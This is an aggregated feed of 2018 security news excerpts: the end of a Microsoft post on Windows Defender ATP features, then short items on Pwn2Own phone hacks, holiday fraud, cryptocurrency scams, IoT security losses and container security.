But we don’t stop there. We also provide an assessment of the impact of threats on your environment (“Am I hit?”), as well as show a view of how many machines were protected (“Were you able to stop this?”) and how many are exposed to the threat because they are not up-to-date or are misconfigured (“Am I exposed?”).

Threat analytics dashboard

Custom detection rules

With Advanced hunting, security analysts love the power they now have to hunt for possible threats across their organization using flexible queries. A growing community of security researchers share their queries with others using the GitHub community repository. These queries can now also be used as custom detection rules, which means that these queries will automatically create and raise an alert when a scheduled query returns a result.

Creating custom detection rules from advanced hunting queries

Integration with Microsoft Information Protection

Windows Defender ATP now provides built-in capabilities for discovery and protection of sensitive data on enterprise endpoints. We have integrated with Azure Information Protection (AIP) Data Discovery, providing visibility into labeled files stored on endpoints. The AIP dashboard and log analytics will include files discovered on Windows devices alongside device risk info from Windows Defender ATP, allowing customers to discover sensitive data at risk on Windows endpoints.

Windows Defender ATP can also automatically protect sensitive files based on their label. Through Office Security and Compliance (SCC) policy, Windows Defender ATP automatically enables Windows Information Protection (WIP) for files with labels that correspond to Office SCC policy.

Integration with Microsoft Cloud App Security

Windows Defender ATP uniquely integrates with Microsoft Cloud App Security to enhance the discovery of shadow IT in an organization as seen from enterprise endpoints. Windows Defender ATP provides a simplified rollout of Cloud App Security discovery as it feeds Cloud App Security with endpoint signals, reducing the need for collecting signals via corporate proxies and allowing seamless collection of signals even when endpoints are outside of the corporate network.

Through this integration, Microsoft Cloud App Security leverages Windows Defender ATP to collect traffic information about client-based and browser-based cloud apps and services being accessed from IT-managed Windows 10 devices. This seamless integration does not require any additional deployment and gives admins a more complete view of the usage of cloud apps and services in their organization.

Innovations that work for you today and the future

These new features in the Windows Defender Advanced Threat Protection unified security platform combine the world-class expertise inside Microsoft and the insightful feedback from you, our customers, for whom we built these solutions. We ask that you continue to engage and partner with us as we continue to evolve Windows Defender ATP.

You can test all new and existing features by signing up to a free 60-day fully featured Windows Defender ATP trial. You can also test drive attack surface reduction and next-gen protection capabilities using the Windows Defender demo page or run DIY simulations for features like Incidents, automated investigation and response, and others directly from the Windows Defender security center portal to see how these capabilities help your organization in real-world scenarios.

Meanwhile, the work to stay ahead of threats doesn’t stop. You can count on the Windows Defender ATP team to continue innovating, learning from our own experiences, and partnering with you to empower you to confidently protect, detect, and respond to advanced attacks.

Moti Gindi
General Manager, Windows Cyber Defense

Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post What’s new in Windows Defender ATP appeared first on Microsoft Secure.

Why you need to know about Penetration Testing and Compliance Audits?

We live in an age where data flows like water, becoming the new life source of our everyday ventures. As such, you can just imagine what all of that entails and the weight that data receive, especially when it comes to a decision making on how to handle this fairly new and arguably invaluable resource. Of course, we are well aware from a very young age that our water needs to be pure, filtered

0-Days Found in iPhone X, Samsung Galaxy S9, Xiaomi Mi6 Phones

At Pwn2Own 2018 mobile hacking competition held in Tokyo on November 13-14, white hat hackers once again demonstrated that even the fully patched smartphones running the latest version of software from popular smartphone manufacturers can be hacked. Three major flagship smartphones—iPhone X, Samsung Galaxy S9, and Xiaomi Mi6—were among the devices that successfully got hacked at the annual

Online shopping fraud to surge during Black Friday and Cyber Monday

New benchmark data from ACI Worldwide revealed a projected 14 percent increase in fraud attempts during the upcoming 2018 peak holiday season. Based on hundreds of millions of merchant transactions, the data shows that fraud attempts are going to be at their highest across the Black Friday and Cyber Monday weekend. Principal findings from the data include:

  • Fraud attempts expected to increase 14% during 2018 peak holiday season
  • Cross Channel fraud continues to grow: In … More

The post Online shopping fraud to surge during Black Friday and Cyber Monday appeared first on Help Net Security.

Cryptocurrency fraud is the exception, not the rule

In recent months, cryptocurrencies like Bitcoin and Ethereum have begun to develop a bad name. The fact that ransomware typically demands payment in Bitcoin has helped to create negative associations for the brand.

Then there are the rapidly fluctuating exchange rates that look like deliberate attempts to manipulate the market. “Pump and dump” is a known tactic used by unscrupulous investors to temporarily increase the value of their holdings before selling them off for maximum value.

And the reality is that scammers and hackers are working the system to perpetuate fraud.

The headlines are only part of the story

Much of the problem with cryptocurrencies is that regulation still lags behind traditional currencies. National banks, like the Federal Reserve or the European Central Bank, have not yet decided how best to deal with cryptocurrency – or how to protect people using them.

This lack of consistency, and the perceived privacy offered by cryptocurrencies, is the reason that criminals are so attracted to the system. So much so that cryptocurrency scams are now the second most common investment scam in Australia, for instance.

Crime sells newspapers, so it is little surprise that the media is quick to publicise instances of fraud. But in the same way that most online transactions made using traditional currencies are perfectly legitimate, so too are cryptocurrency transactions. Fraud remains a small part of the bigger cryptocurrency picture, even if the media headlines suggest otherwise.

Digging into the statistics proves this to be the case. Take the Australian example. In 2017, there were a total of 200,000 scam reports submitted to the Australian Competition and Consumer Commission – the government body that enforces consumer protection law. The accumulated losses from these scams were AUD $340 million – a fairly large number for a country of 25 million people.

But when you drill down into those figures, just AUD $2.1 million of those losses were attributed to cryptocurrency fraud. Less than 1% of all reported fraud in Australia was cryptocurrency related.

On a worldwide scale, however, Bitcoin estimates that $3.25 billion will be lost to fraud.

A serious problem for the unprepared

Like any other currency, cryptocurrencies can be risky for the unprepared. Before jumping on the Bitcoin bandwagon, you must understand what it is for, how it is used, and the common scams you need to avoid.

At the front end, always be suspicious of “get rich quick” schemes. These systems can be very profitable – for the scammer running them. You should always check anything that sounds too good to be true. Similarly, check that websites maintain the same level of security as any other online store before making a cryptocurrency payment.

One other thing to bear in mind – virtual wallets. Virtual wallets are used to securely store your cryptocurrency on your computer. If the wallet is compromised or stolen, your cryptocurrency goes with it.

Hackers will try to steal digital wallets, so it is vital that your computer is properly secured. You must install robust anti-malware, like Panda Dome, on your computer to identify and block unauthorised attempts to access your wallet and its contents.

“Bitcoin is one of the biggest scams in centuries, like the one the world has never seen, and we are only at the beginning of this history. Bitcoin scams have been famously criminal and public in nature. The bottom line is scammers also want to profit somehow from Bitcoin, but through nefarious means. This typically involves targeting unprepared victims, who end up losing their Bitcoin as a result. We need to know and make sure we don’t become the next victim”, explains Herve Lambert, Global Consumer Operations Manager at Panda Security.

For most people, cryptocurrency is not yet an issue. But when you do decide to start using one, make sure that you are properly protected, so that you avoid becoming one of the minority of people who fall victim to scams.


The post Cryptocurrency fraud is the exception, not the rule appeared first on Panda Security Mediacenter.

IoT related security missteps cost enterprises millions

Enterprises have begun sustaining significant monetary losses stemming from the lack of good practices as they move forward with incorporating the IoT into their business models, according to a new study from DigiCert. Among companies surveyed that are struggling the most with IoT security, 25 percent reported IoT security-related losses of at least $34 million in the last two years. These findings come amid a ramping up of IoT focus within the typical organization. Eighty-three …

The post IoT related security missteps cost enterprises millions appeared first on Help Net Security.

Container strategies don’t take security seriously enough

Most organizations do not feel prepared to adequately secure cloud-native applications, despite the surging adoption of containers and Kubernetes, according to StackRox. Notable findings: more than a third of organizations with concerns about their container strategy worry that their strategies don’t adequately address container security; an additional 15 percent believe their strategies don’t take seriously enough the threat to containers and Kubernetes deployments; more than one-third of respondents haven’t started or are just creating their …

The post Container strategies don’t take security seriously enough appeared first on Help Net Security.